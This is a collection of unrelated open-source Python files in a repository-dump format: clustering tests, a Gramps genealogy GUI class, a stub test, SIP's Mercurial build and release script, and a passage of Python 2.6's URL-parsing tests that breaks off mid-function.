connectivity_include_self = kneighbors_graph(X, 3, include_self=True)
aglc1 = AgglomerativeClustering(connectivity=connectivity)
aglc2 = AgglomerativeClustering(connectivity=connectivity_include_self)
aglc1.fit(X)
aglc2.fit(X)
assert_array_equal(aglc1.labels_, aglc2.labels_)
def test_compute_full_tree():
# Test that the full tree is computed if n_clusters is small
rng = np.random.RandomState(0)
X = rng.randn(10, 2)
connectivity = kneighbors_graph(X, 5, include_self=False)
# When n_clusters is less, the full tree should be built
# that is the number of merges should be n_samples - 1
agc = AgglomerativeClustering(n_clusters=2, connectivity=connectivity)
agc.fit(X)
n_samples = X.shape[0]
n_nodes = agc.children_.shape[0]
assert_equal(n_nodes, n_samples - 1)
# When n_clusters is large, greater than max of 100 and 0.02 * n_samples.
# we should stop when there are n_clusters.
n_clusters = 101
X = rng.randn(200, 2)
connectivity = kneighbors_graph(X, 10, include_self=False)
agc = AgglomerativeClustering(n_clusters=n_clusters,
connectivity=connectivity)
agc.fit(X)
n_samples = X.shape[0]
n_nodes = agc.children_.shape[0]
assert_equal(n_nodes, n_samples - n_clusters)
def test_n_components():
# Test n_components returned by linkage, average and ward tree
rng = np.random.RandomState(0)
X = rng.rand(5, 5)
# Connectivity matrix having five components.
connectivity = np.eye(5)
for linkage_func in _TREE_BUILDERS.values():
assert_equal(ignore_warnings(linkage_func)(X, connectivity)[1], 5)
def test_agg_n_clusters():
# Test that an error is raised when n_clusters <= 0
rng = np.random.RandomState(0)
X = rng.rand(20, 10)
for n_clus in [-1, 0]:
agc = AgglomerativeClustering(n_clusters=n_clus)
msg = ("n_clusters should be an integer greater than 0."
" %s was provided." % str(agc.n_clusters))
assert_raise_message(ValueError, msg, agc.fit, X)
|
ennoborg/gramps
|
refs/heads/master
|
gramps/gui/editors/displaytabs/familyattrembedlist.py
|
11
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2006 Donald N. Allingham
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# Gramps classes
#
#-------------------------------------------------------------------------
from .attrembedlist import AttrEmbedList
#-------------------------------------------------------------------------
#
#
#
#-------------------------------------------------------------------------
class FamilyAttrEmbedList(AttrEmbedList):
def __init__(self, dbstate, uistate, track, data):
AttrEmbedList.__init__(self, dbstate, uistate, track, data)
def get_editor(self):
from .. import EditAttribute
return EditAttribute
def get_user_values(self):
return self.dbstate.db.get_family_attribute_types()
|
vmthunder/volt
|
refs/heads/master
|
volt/tests/test_volt.py
|
3
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
test_volt
----------------------------------
Tests for `volt` module.
"""
from volt.tests import base
class TestVolt(base.TestCase):
def test_something(self):
pass
|
cypod/arsenalsuite
|
refs/heads/master
|
cpp/lib/sip/build.py
|
11
|
#!/usr/bin/python
# Copyright (c) 2011 Riverbank Computing Limited <info@riverbankcomputing.com>
#
# This file is part of SIP.
#
# This copy of SIP is licensed for use under the terms of the SIP License
# Agreement. See the file LICENSE for more details.
#
# This copy of SIP may also used under the terms of the GNU General Public
# License v2 or v3 as published by the Free Software Foundation which can be
# found in the files LICENSE-GPL2 and LICENSE-GPL3 included in this package.
#
# SIP is supplied WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
"""This script prepares a repository copy of SIP for building and does all the
work of creating a packaged release. It should be run from a Mercurial
repository or a Mercurial archive. It is not part of a packaged release.
"""
import os
import shutil
import sys
import tarfile
import zipfile
# MacHg is not on sys.path, so put it there if we find it.
MacHgPath = '/Applications/MacHg.app/Contents/Plugins/LocalMercurial'
if os.path.isdir(MacHgPath):
sys.path.append(MacHgPath)
# The files that need to be patched with the version number.
_PatchedFiles = (
('configure.py', ),
('sipgen', 'sip.h'),
('siplib', 'sip.h.in'),
('sphinx', 'conf.py'), ('sphinx', 'introduction.rst'))
# Specific files that are auto-generated and need to be cleaned.
_GeneratedFiles = (
('Makefile', ), ('sipconfig.py', ),
('sipgen', 'Makefile'), ('sipgen', 'lexer.c'), ('sipgen', 'parser.c'),
('sipgen', 'parser.h'), ('sipgen', 'sip'),
('siplib', 'Makefile'), ('siplib', 'sip.h'), ('siplib', 'siplib.c'),
('siplib', 'siplib.sbf'))
# File types that are auto-generated and need to be cleaned.
_GeneratedFileTypes = ('.pyc', '.o', '.obj', '.so', '.pyd', '.exp', '.exe',
'.gz', '.zip')
# Directories that are auto-generated and need to be cleaned.
_GeneratedDirs = (
('doc', ), )
# Files in a release.
_ReleasedFiles = ('configure.py.in', 'LICENSE', 'LICENSE-GPL2', 'LICENSE-GPL3',
'NEWS', 'README', 'sipdistutils.py', 'siputils.py')
# Directories in a release.
_ReleasedDirs = ('custom', 'sipgen', 'siplib', 'specs', 'sphinx')
# The root directory, i.e. the one containing this script.
_RootDir = os.path.dirname(os.path.abspath(__file__))
def _release_tag(ctx):
""" Get the release tag (i.e. a tag of the form x.y[.z]) converted to a
3-tuple of integers if there is one.
:param ctx:
The Mercurial change context containing the tags.
:return:
The 3-tuple of integers or None if there was no release tag.
"""
for tag in ctx.tags():
if tag != 'tip':
parts = tag.split('.')
if len(parts) == 2:
parts.append('0')
if len(parts) == 3:
major, minor, micro = parts
try:
return (int(major), int(minor), int(micro))
except ValueError:
pass
return None
def _format_changelog(ctx):
""" Format the log message for a changeset.
:param ctx:
The Mercurial change context containing the tags.
:return:
The formatted change log.
"""
from mercurial.util import datestr
log = "changeset: %s\ndate: %s\n%s" % (str(ctx), datestr(ctx.date()), ctx.description())
return log
def _get_release():
""" Get the release of the package.
:return:
A tuple of the full release name, the version number, the hexadecimal
version number and a list of changelog entries (all as strings).
"""
# The root directory should contain dot files that tell us what sort of
# package we are.
release_suffix = ''
if os.path.exists(os.path.join(_RootDir, '.hg')):
# Handle a Mercurial repository.
from mercurial import hg, ui
# Get the repository.
repo = hg.repository(ui.ui(), _RootDir)
# The last changeset is the "parent" of the working directory.
ctx = repo[None].parents()[0]
# If the one before the last changeset has a release tag then the last
# changeset refers to the tagging and not a genuine change.
before = ctx.parents()[0]
version = _release_tag(before)
if version is not None:
ctx = before
else:
release_suffix = '-snapshot-' + str(ctx)
changelog = [_format_changelog(ctx)]
# Go back through the line of the first parent to find the last
# release.
parent_version = None
parents = ctx.parents()
while len(parents) != 0:
parent_ctx = parents[0]
changelog.append(_format_changelog(parent_ctx))
parent_version = _release_tag(parent_ctx)
if parent_version is not None:
break
parents = parent_ctx.parents()
if version is None and parent_version is not None:
# This is a snapshot so work out what the next version will be
# based on the previous version.
major, minor, micro = parent_version
if ctx.branch() == 'default':
minor += 1
# This should be 0 anyway.
micro = 0
else:
micro += 1
version = (major, minor, micro)
else:
# Handle a Mercurial archive.
changelog = None
name = os.path.basename(_RootDir)
release_suffix = "-unknown"
version = None
parts = name.split('-')
if len(parts) > 1:
name = parts[-1]
if len(name) == 12:
# This is the best we can do without access to the repository.
release_suffix = '-' + name
# Format the results.
if version is None:
version = (0, 1, 0)
major, minor, micro = version
if micro == 0:
version = '%d.%d' % (major, minor)
else:
version = '%d.%d.%d' % (major, minor, micro)
release = '%s%s' % (version, release_suffix)
hex_version = '%02x%02x%02x' % (major, minor, micro)
return release, version, hex_version, changelog
def _progress(message, quiet):
""" Show a progress message to the user.
:param message:
The text of the message (without a newline).
:param quiet:
Set if progress messages should be suppressed.
"""
if not quiet:
sys.stdout.write(message)
sys.stdout.write("\n")
def _rooted_name(package, *path):
""" Convert a sequence of path components to a name below the root
directory.
:param package:
The name of the optional package directory.
:param \*path:
The sequence of path components.
:return:
The name.
"""
name = os.path.join(*path)
if package is not None:
name = os.path.join(package, name)
name = os.path.join(_RootDir, name)
return name
def _remove_file(name, quiet):
""" Remove a file, ignoring any errors.
:param name:
The name of the file.
:param quiet:
Set if progress messages should be suppressed.
"""
_progress("Removing %s" % name, quiet)
try:
os.remove(name)
except:
pass
def _create_directory(name, quiet):
""" Create a directory.
:param name:
The name of the directory.
:param quiet:
Set if progress messages should be suppressed.
"""
_progress("Creating directory %s" % name, quiet)
try:
os.mkdir(name)
except:
pass
def _remove_directory(name, quiet):
""" Remove a directory, ignoring any errors.
:param name:
The name of the directory.
:param quiet:
Set if progress messages should be suppressed.
"""
_progress("Removing directory %s" % name, quiet)
shutil.rmtree(name, ignore_errors=True)
def _patch_files(package, quiet, clean_patches):
""" Patch the required files to contain the correct version information.
:param package:
The name of the optional package directory.
:param quiet:
Set if progress messages should be suppressed.
:param clean_patches:
Set if the original files should be removed after creating the patched
version.
"""
release, version, hex_version, _ = _get_release()
for f in _PatchedFiles:
dst_fn = _rooted_name(package, *f)
src_fn = dst_fn + '.in'
_progress("Patching %s" % dst_fn, quiet)
dst = open(dst_fn, 'w')
src = open(src_fn)
for line in src:
line = line.replace('@RM_RELEASE@', release)
line = line.replace('@RM_VERSION@', version)
line = line.replace('@RM_HEXVERSION@', hex_version)
dst.write(line)
dst.close()
src.close()
if clean_patches:
_remove_file(src_fn, quiet)
def _run_tools(package, quiet):
""" Run flex and bison. This should really be done from make but the SIP
build system doesn't support it - and it will be gone in SIP v5 anyway.
:param package:
The name of the optional package directory.
:param quiet:
Set if progress messages should be suppressed.
"""
sipgen = _rooted_name(package, 'sipgen')
lexer = os.path.join(sipgen, 'lexer')
_progress("Running flex to create %s.c" % lexer, quiet)
os.system('flex -o%s.c %s.l' % (lexer, lexer))
parser = os.path.join(sipgen, 'parser')
_progress("Running bison to create %s.c" % parser, quiet)
os.system('bison -y -d -o %s.c %s.y' % (parser, parser))
def _run_sphinx(package=None, quiet=True, clean=False):
""" Run Sphinx to create the HTML documentation.
:param package:
The name of the optional package directory.
:param quiet:
Set if progress messages should be suppressed.
:param clean:
Set if the .buildinfo file and .doctrees directory should be removed.
"""
sphinx = _rooted_name(package, 'sphinx')
doc = _rooted_name(package, 'doc')
html = os.path.join(doc, 'html')
if quiet:
qflag = ' -q'
else:
qflag = ''
_progress("Creating HTML documentation in %s" % html, quiet)
os.system('sphinx-build%s -b html %s %s' % (qflag, sphinx, html))
if clean:
_remove_file(os.path.join(html, '.buildinfo'), quiet)
_remove_directory(os.path.join(html, '.doctrees'), quiet)
def _prepare_root(package=None, quiet=True, clean_patches=False):
""" Prepare a directory.
:param package:
The name of the optional package directory.
:param quiet:
Set if progress messages should be suppressed.
:param clean_patches:
Set if the original files should be removed after creating the patched
version.
"""
_patch_files(package, quiet, clean_patches)
_run_tools(package, quiet)
def _clean_root(package=None, quiet=True):
""" Clean up a directory.
:param package:
The name of the optional package directory.
:param quiet:
Set if progress messages should be suppressed.
"""
for f in _PatchedFiles:
_remove_file(_rooted_name(package, *f), quiet)
for f in _GeneratedFiles:
_remove_file(_rooted_name(package, *f), quiet)
root = _RootDir
if package is not None:
root = os.path.join(root, package)
for dirpath, dirnames, filenames in os.walk(root):
try:
dirnames.remove('.hg')
except ValueError:
pass
for f in filenames:
for ext in _GeneratedFileTypes:
if f.endswith(ext):
name = os.path.join(dirpath, f)
_remove_file(name, quiet)
for d in _GeneratedDirs:
_remove_directory(_rooted_name(package, *d), quiet)
def changelog(output, quiet=True):
""" The description of each change set going back to the last release are
written to a file object.
:param output:
The file object that the log is written to.
:param quiet:
Set if progress messages should be suppressed.
:return:
True if the log was written or False if the information wasn't
available (because this is a Mercurial archive).
"""
_, _, _, changelog = _get_release()
if changelog is None:
return False
output.write("\n\n".join(changelog) + "\n")
return True
def clean(quiet=True):
""" Clean by removing all files and directories not stored in the
repository.
:param quiet:
Set if progress messages should be suppressed.
"""
_clean_root(quiet=quiet)
release, _, _, _ = _get_release()
package = 'sip-' + release
_remove_directory(package, quiet)
def doc(quiet=True):
""" Create the documentation.
:param quiet:
Set if progress messages should be suppressed.
"""
_run_sphinx(quiet=quiet)
def prepare(quiet=True):
""" Prepare for configuration and building by creating all the required
additional files.
:param quiet:
Set if progress messages should be suppressed.
"""
_prepare_root(quiet=quiet)
def release(quiet=True):
""" Generate a set of release packages.
:param quiet:
Set if progress messages should be suppressed.
"""
release, _, _, _ = _get_release()
package = 'sip-' + release
_remove_directory(package, quiet)
_create_directory(package, quiet)
for f in _ReleasedFiles:
_progress("Adding file %s to release" % f, quiet)
shutil.copy2(f, package)
for d in _ReleasedDirs:
_progress("Adding directory %s to release" % d, quiet)
shutil.copytree(d, os.path.join(package, d))
_clean_root(package=package, quiet=quiet)
_prepare_root(package=package, quiet=quiet, clean_patches=True)
_run_sphinx(package=package, quiet=quiet, clean=True)
tar_package = package + '.tar.gz'
_progress("Creating package %s" % tar_package, quiet)
tf = tarfile.open(tar_package, 'w:gz')
tf.add(package)
tf.close()
zip_package = package + '.zip'
_progress("Creating package %s" % zip_package, quiet)
zf = zipfile.ZipFile(zip_package, 'w', zipfile.ZIP_DEFLATED)
for dirpath, dirnames, filenames in os.walk(package):
for f in filenames:
zf.write(os.path.join(dirpath, f))
zf.close()
def version(quiet=True):
""" Get the full version name of the package. If it is a release then it
will be of the form x.y[.z]. If it is a snapshot then it will be of the
form snapshot-x.y[.z]-changeset where x.y[.z] is the version number of the
next release (not the previous one). If this is a Mercurial archive
(rather than a repository) then it does the best it can (based on the name
of the directory) with the limited information available.
:param quiet:
Set if progress messages should be suppressed.
:return:
The full version name.
"""
release, _, _, _ = _get_release()
return release
if __name__ == '__main__':
def _changelog(options):
"""get the changelog entries since the last release"""
if not changelog(sys.stdout, quiet=options.quiet):
sys.stderr.write("Unable to produce a changelog without a repository\n")
sys.exit(2)
def _clean(options):
"""remove all files not stored in the repository"""
clean(quiet=options.quiet)
def _doc(options):
"""create the documentation"""
doc(quiet=options.quiet)
def _prepare(options):
"""prepare for configuration and building"""
prepare(quiet=options.quiet)
def _release(options):
"""generate release packages"""
release(quiet=options.quiet)
def _version(options):
"""query the version of the package"""
sys.stdout.write(version(quiet=options.quiet) + "\n")
actions = (_changelog, _clean, _doc, _prepare, _release, _version)
import optparse
class MyParser(optparse.OptionParser):
def get_usage(self):
""" Reimplemented to add the description of the actions. We don't
use the description because the default formatter strips newlines.
"""
usage = optparse.OptionParser.get_usage(self)
usage += "\n" + __doc__ + "\nActions:\n"
for action in actions:
usage += " %-9s %s\n" % (action.func_name[1:], action.func_doc)
return usage
action_names = [action.func_name[1:] for action in actions]
rel, _, _, _ = _get_release()
parser = MyParser(
usage="%%prog [options] %s" % '|'.join(action_names), version=rel)
parser.add_option("-q", "--quiet", action='store_true', default=False,
dest='quiet', help="suppress progress messages")
options, args = parser.parse_args()
if len(args) != 1:
parser.print_help()
sys.exit(1)
for action in actions:
if action.func_name[1:] == args[0]:
action(options)
break
else:
parser.print_help()
sys.exit(1)
sys.exit()
|
MalloyPower/parsing-python
|
refs/heads/master
|
front-end/testsuite-python-lib/Python-2.6/Lib/test/test_urlparse.py
|
55
|
#! /usr/bin/env python
from test import test_support
import unittest
import urlparse
RFC1808_BASE = "http://a/b/c/d;p?q#f"
RFC2396_BASE = "http://a/b/c/d;p?q"
RFC3986_BASE = "http://a/b/c/d;p?q"
# A list of test cases. Each test case is a a two-tuple that contains
# a string with the query and a dictionary with the expected result.
parse_qsl_test_cases = [
("", []),
("&", []),
("&&", []),
("=", [('', '')]),
("=a", [('', 'a')]),
("a", [('a', '')]),
("a=", [('a', '')]),
("a=", [('a', '')]),
("&a=b", [('a', 'b')]),
("a=a+b&b=b+c", [('a', 'a b'), ('b', 'b c')]),
("a=1&a=2", [('a', '1'), ('a', '2')]),
]
class UrlParseTestCase(unittest.TestCase):
def checkRoundtrips(self, url, parsed, split):
result = urlparse.urlparse(url)
self.assertEqual(result, parsed)
t = (result.scheme, result.netloc, result.path,
result.params, result.query, result.fragment)
self.assertEqual(t, parsed)
# put it back together and it should be the same
result2 = urlparse.urlunparse(result)
self.assertEqual(result2, url)
self.assertEqual(result2, result.geturl())
# the result of geturl() is a fixpoint; we can always parse it
# again to get the same result:
result3 = urlparse.urlparse(result.geturl())
self.assertEqual(result3.geturl(), result.geturl())
self.assertEqual(result3, result)
self.assertEqual(result3.scheme, result.scheme)
self.assertEqual(result3.netloc, result.netloc)
self.assertEqual(result3.path, result.path)
self.assertEqual(result3.params, result.params)
self.assertEqual(result3.query, result.query)
self.assertEqual(result3.fragment, result.fragment)
self.assertEqual(result3.username, result.username)
self.assertEqual(result3.password, result.password)
self.assertEqual(result3.hostname, result.hostname)
self.assertEqual(result3.port, result.port)
# check the roundtrip using urlsplit() as well
result = urlparse.urlsplit(url)
self.assertEqual(result, split)
t = (result.scheme, result.netloc, result.path,
result.query, result.fragment)
self.assertEqual(t, split)
result2 = urlparse.urlunsplit(result)
self.assertEqual(result2, url)
self.assertEqual(result2, result.geturl())
# check the fixpoint property of re-parsing the result of geturl()
result3 = urlparse.urlsplit(result.geturl())
self.assertEqual(result3.geturl(), result.geturl())
self.assertEqual(result3, result)
self.assertEqual(result3.scheme, result.scheme)
self.assertEqual(result3.netloc, result.netloc)
self.assertEqual(result3.path, result.path)
self.assertEqual(result3.query, result.query)
self.assertEqual(result3.fragment, result.fragment)
self.assertEqual(result3.username, result.username)
self.assertEqual(result3.password, result.password)
self.assertEqual(result3.hostname, result.hostname)
self.assertEqual(result3.port, result.port)
def test_qsl(self):
for orig, expect in parse_qsl_test_cases:
result = urlparse.parse_qsl(orig, keep_blank_values=True)
self.assertEqual(result, expect, "Error parsing %s" % repr(orig))
def test_roundtrips(self):
testcases = [
('file:///tmp/junk.txt',
('file', '', '/tmp/junk.txt', '', '', ''),
('file', '', '/tmp/junk.txt', '', '')),
('imap://mail.python.org/mbox1',
('imap', 'mail.python.org', '/mbox1', '', '', ''),
('imap', 'mail.python.org', '/mbox1', '', '')),
('mms://wms.sys.hinet.net/cts/Drama/09006251100.asf',
('mms', 'wms.sys.hinet.net', '/cts/Drama/09006251100.asf',
'', '', ''),
('mms', 'wms.sys.hinet.net', '/cts/Drama/09006251100.asf',
'', '')),
('svn+ssh://svn.zope.org/repos/main/ZConfig/trunk/',
('svn+ssh', 'svn.zope.org', '/repos/main/ZConfig/trunk/',
'', '', ''),
('svn+ssh', 'svn.zope.org', '/repos/main/ZConfig/trunk/',
'', ''))
]
for url, parsed, split in testcases:
self.checkRoundtrips(url, parsed, split)
def test_http_roundtrips(self):
# urlparse.urlsplit treats 'http:' as an optimized special case,
# so we test both 'http:' and 'https:' in all the following.
# Three cheers for white box knowledge!
testcases = [
('://www.python.org',
('www.python.org', '', '', '', ''),
('www.python.org', '', '', '')),
('://www.python.org#abc',
('www.python.org', '', '', '', 'abc'),
('www.python.org', '', '', 'abc')),
('://www.python.org?q=abc',
('www.python.org', '', '', 'q=abc', ''),
('www.python.org', '', 'q=abc', '')),
('://www.python.org/#abc',
('www.python.org', '/', '', '', 'abc'),
('www.python.org', '/', '', 'abc')),
('://a/b/c/d;p?q#f',
('a', '/b/c/d', 'p', 'q', 'f'),
('a', '/b/c/d;p', 'q', 'f')),
]
for scheme in ('http', 'https'):
for url, parsed, split in testcases:
url = scheme + url
parsed = (scheme,) + parsed
split = (scheme,) + split
self.checkRoundtrips(url, parsed, split)
def checkJoin(self, base, relurl, expected):
self.assertEqual(urlparse.urljoin(base, relurl), expected,
(base, relurl, expected))
def test_unparse_parse(self):
for u in ['Python', './Python']:
self.assertEqual(urlparse.urlunsplit(urlparse.urlsplit(u)), u)
self.assertEqual(urlparse.urlunparse(urlparse.urlparse(u)), u)
def test_RFC1808(self):
# "normal" cases from RFC 1808:
self.checkJoin(RFC1808_BASE, 'g:h', 'g:h')
self.checkJoin(RFC1808_BASE, 'g', 'http://a/b/c/g')
self.checkJoin(RFC1808_BASE, './g', 'http://a/b/c/g')
self.checkJoin(RFC1808_BASE, 'g/', 'http://a/b/c/g/')
self.checkJoin(RFC1808_BASE, '/g', 'http://a/g')
self.checkJoin(RFC1808_BASE, '//g', 'http://g')
self.checkJoin(RFC1808_BASE, 'g?y', 'http://a/b/c/g?y')
self.checkJoin(RFC1808_BASE, 'g?y/./x', 'http://a/b/c/g?y/./x')
self.checkJoin(RFC1808_BASE, '#s', 'http://a/b/c/d;p?q#s')
self.checkJoin(RFC1808_BASE, 'g#s', 'http://a/b/c/g#s')
self.checkJoin(RFC1808_BASE, 'g#s/./x', 'http://a/b/c/g#s/./x')
self.checkJoin(RFC1808_BASE, 'g?y#s', 'http://a/b/c/g?y#s')
self.checkJoin(RFC1808_BASE, 'g;x', 'http://a/b/c/g;x')
self.checkJoin(RFC1808_BASE, 'g;x?y#s', 'http://a/b/c/g;x?y#s')
self.checkJoin(RFC1808_BASE, '.', 'http://a/b/c/')
self.checkJoin(RFC1808_BASE, './', 'http://a/b/c/')
self.checkJoin(RFC1808_BASE, '..', 'http://a/b/')
self.checkJoin(RFC1808_BASE, '../', 'http://a/b/')
self.checkJoin(RFC1808_BASE, '../g', 'http://a/b/g')
self.checkJoin(RFC1808_BASE, '../..', 'http://a/')
self.checkJoin(RFC1808_BASE, '../../', 'http://a/')
self.checkJoin(RFC1808_BASE, '../../g', 'http://a/g')
# "abnormal" cases from RFC 1808:
self.checkJoin(RFC1808_BASE, '', 'http://a/b/c/d;p?q#f')
self.checkJoin(RFC1808_BASE, '../../../g', 'http://a/../g')
self.checkJoin(RFC1808_BASE, '../../../../g', 'http://a/../../g')
self.checkJoin(RFC1808_BASE, '/./g', 'http://a/./g')
self.checkJoin(RFC1808_BASE, '/../g', 'http://a/../g')
self.checkJoin(RFC1808_BASE, 'g.', 'http://a/b/c/g.')
self.checkJoin(RFC1808_BASE, '.g', 'http://a/b/c/.g')
self.checkJoin(RFC1808_BASE, 'g..', 'http://a/b/c/g..')
self.checkJoin(RFC1808_BASE, '..g', 'http://a/b/c/..g')
self.checkJoin(RFC1808_BASE, './../g', 'http://a/b/g')
self.checkJoin(RFC1808_BASE, './g/.', 'http://a/b/c/g/')
self.checkJoin(RFC1808_BASE, 'g/./h', 'http://a/b/c/g/h')
self.checkJoin(RFC1808_BASE, 'g/../h', 'http://a/b/c/h')
# RFC 1808 and RFC 1630 disagree on these (according to RFC 1808),
# so we'll not actually run these tests (which expect 1808 behavior).
#self.checkJoin(RFC1808_BASE, 'http:g', 'http:g')
#self.checkJoin(RFC1808_BASE, 'http:', 'http:')
def test_RFC2396(self):
# cases from RFC 2396
self.checkJoin(RFC2396_BASE, 'g:h', 'g:h')
self.checkJoin(RFC2396_BASE, 'g', 'http://a/b/c/g')
self.checkJoin(RFC2396_BASE, './g', 'http://a/b/c/g')
self.checkJoin(RFC2396_BASE, 'g/', 'http://a/b/c/g/')
self.checkJoin(RFC2396_BASE, '/g', 'http://a/g')
self.checkJoin(RFC2396_BASE, '//g', 'http://g')
self.checkJoin(RFC2396_BASE, 'g?y', 'http://a/b/c/g?y')
self.checkJoin(RFC2396_BASE, '#s', 'http://a/b/c/d;p?q#s')
self.checkJoin(RFC2396_BASE, 'g#s', 'http://a/b/c/g#s')
self.checkJoin(RFC2396_BASE, 'g?y#s', 'http://a/b/c/g?y#s')
self.checkJoin(RFC2396_BASE, 'g;x', 'http://a/b/c/g;x')
self.checkJoin(RFC2396_BASE, 'g;x?y#s', 'http://a/b/c/g;x?y#s')
self.checkJoin(RFC2396_BASE, '.', 'http://a/b/c/')
self.checkJoin(RFC2396_BASE, './', 'http://a/b/c/')
self.checkJoin(RFC2396_BASE, '..', 'http://a/b/')
self.checkJoin(RFC2396_BASE, '../', 'http://a/b/')
self.checkJoin(RFC2396_BASE, '../g', 'http://a/b/g')
self.checkJoin(RFC2396_BASE, '../..', 'http://a/')
self.checkJoin(RFC2396_BASE, '../../', 'http://a/')
self.checkJoin(RFC2396_BASE, '../../g', 'http://a/g')
self.checkJoin(RFC2396_BASE, '', RFC2396_BASE)
self.checkJoin(RFC2396_BASE, '../../../g', 'http://a/../g')
self.checkJoin(RFC2396_BASE, '../../../../g', 'http://a/../../g')
self.checkJoin(RFC2396_BASE, '/./g', 'http://a/./g')
self.checkJoin(RFC2396_BASE, '/../g', 'http://a/../g')
self.checkJoin(RFC2396_BASE, 'g.', 'http://a/b/c/g.')
self.checkJoin(RFC2396_BASE, '.g', 'http://a/b/c/.g')
self.checkJoin(RFC2396_BASE, 'g..', 'http://a/b/c/g..')
self.checkJoin(RFC2396_BASE, '..g', 'http://a/b/c/..g')
self.checkJoin(RFC2396_BASE, './../g', 'http://a/b/g')
self.checkJoin(RFC2396_BASE, './g/.', 'http://a/b/c/g/')
self.checkJoin(RFC2396_BASE, 'g/./h', 'http://a/b/c/g/h')
self.checkJoin(RFC2396_BASE, 'g/../h', 'http://a/b/c/h')
self.checkJoin(RFC2396_BASE, 'g;x=1/./y', 'http://a/b/c/g;x=1/y')
self.checkJoin(RFC2396_BASE, 'g;x=1/../y', 'http://a/b/c/y')
self.checkJoin(RFC2396_BASE, 'g?y/./x', 'http://a/b/c/g?y/./x')
self.checkJoin(RFC2396_BASE, 'g?y/../x', 'http://a/b/c/g?y/../x')
self.checkJoin(RFC2396_BASE, 'g#s/./x', 'http://a/b/c/g#s/./x')
self.checkJoin(RFC2396_BASE, 'g#s/../x', 'http://a/b/c/g#s/../x')
#The following scenarios have been updated in RFC3986
#self.checkJoin(RFC2396_BASE, '?y', 'http://a/b/c/?y')
#self.checkJoin(RFC2396_BASE, ';x', 'http://a/b/c/;x')
def test_RFC3986(self):
self.checkJoin(RFC3986_BASE, '?y','http://a/b/c/d;p?y')
self.checkJoin(RFC2396_BASE, ';x', 'http://a/b/c/;x')
def test_urldefrag(self):
for url, defrag, frag in [
('http://python.org#frag', 'http://python.org', 'frag'),
('http://python.org', 'http://python.org', ''),
('http://python.org/#frag', 'http://python.org/', 'frag'),
('http://python.org/', 'http://python.org/', ''),
('http://python.org/?q#frag', 'http://python.org/?q', 'frag'),
('http://python.org/?q', 'http://python.org/?q', ''),
('http://python.org/p#frag', 'http://python.org/p', 'frag'),
('http://python.org/p?q', 'http://python.org/p?q', ''),
(RFC1808_BASE, 'http://a/b/c/d;p?q', 'f'),
(RFC2396_BASE, 'http://a/b/c/d;p?q', ''),
]:
self.assertEqual(urlparse.urldefrag(url), (defrag, frag))
def test_urlsplit_attributes(self):
url = "HTTP://WWW.PYTHON.ORG/doc/#frag"
p = urlparse.urlsplit(url)
self.assertEqual(p.scheme, "http")
self.assertEqual(p.netloc, "WWW.PYTHON.ORG")
self.assertEqual(p.path, "/doc/")
self.assertEqual(p.query, "")
self.assertEqual(p.fragment, "frag")
self.assertEqual(p.username, None)
self.assertEqual(p.password, None)
self.assertEqual(p.hostname, "www.python.org")
self.assertEqual(p.port, None)
# geturl() won't return exactly the original URL in this case
# since the scheme is always case-normalized
#self.assertEqual(p.geturl(), url)
url = "http://User:Pass@www.python.org:080/doc/?query=yes#frag"
p = urlparse.urlsplit(url)
self.assertEqual(p.scheme, "http")
self.assertEqual(p.netloc, "User:Pass@www.python.org:080")
self.assertEqual(p.path, "/doc/")
self.assertEqual(p.query, "query=yes")
self.assertEqual(p.fragment, "frag")
self.assertEqual(p.username, "User")
self.assertEqual(p.password, "Pass")
self.assertEqual(p.hostname, "www.python.org")
self.assertEqual(p.port, 80)
self.assertEqual(p.geturl(), url)
# Addressing issue1698, which suggests Username can contain
# "@" characters. Though not RFC compliant, many ftp sites allow
# and request email addresses as usernames.
url = "http://User@example.com:Pass@www.python.org:080/doc/?query=yes#frag"
p = urlparse.urlsplit(url)
self.assertEqual(p.scheme, "http")
self.assertEqual(p.netloc, "User@example.com:Pass@www.python.org:080")
self.assertEqual(p.path, "/doc/")
self.assertEqual(p.query, "query=yes")
self.assertEqual(p.fragment, "frag")
self.assertEqual(p.username, "User@example.com")
self.assertEqual(p.password, "Pass")
self.assertEqual(p.hostname, "www.python.org")
self.assertEqual(p.port, 80)
self.assertEqual(p.geturl(), url)
def test_attributes_bad_port(self):
"""Check handling of non-integer ports."""
p = urlparse.urlsplit("http://www.example.net:foo")
self.assertEqual(p.netloc, "www.example.net:foo")
self.assertRaises(ValueError, lambda: p.port)
p = urlparse.urlparse("http://www.example.net:foo")
self.assertEqual(p.netloc, "www.example.net:foo")
self.assertRaises(ValueError, lambda: p.port)
def test_attributes_without_netloc(self):
# This example is straight from RFC 3261. It looks like it
# should allow the username, hostname, and port to be filled
# in, but doesn't. Since it's a URI and doesn't use the
# scheme://netloc syntax, the netloc and related attributes
# should be left empty.
uri = "sip:alice@atlanta.com;maddr=239.255.255.1;ttl=15"
p = urlparse.urlsplit(uri)
self.assertEqual(p.netloc, "")
self.assertEqual(p.username, None)
self.assertEqual(p.password, None)
self.assertEqual(p.hostname, None)
self.assertEqual(p.port, None)
self.assertEqual(p.geturl(), uri)
p = urlparse.urlparse(uri)
self.assertEqual(p.netloc, "")
self.assertEqual(p.username, None)
self.assertEqual(p.password, None)
self.assertEqual(p.hostname, None)
self.assertEqual(p.port, None)
self.assertEqual(p.geturl(), uri)
def test_caching(self):
# Test case for bug #1313119
uri = "http://example.com/doc/"
unicode_uri = unicode(uri)
urlparse.urlparse(unicode_uri)
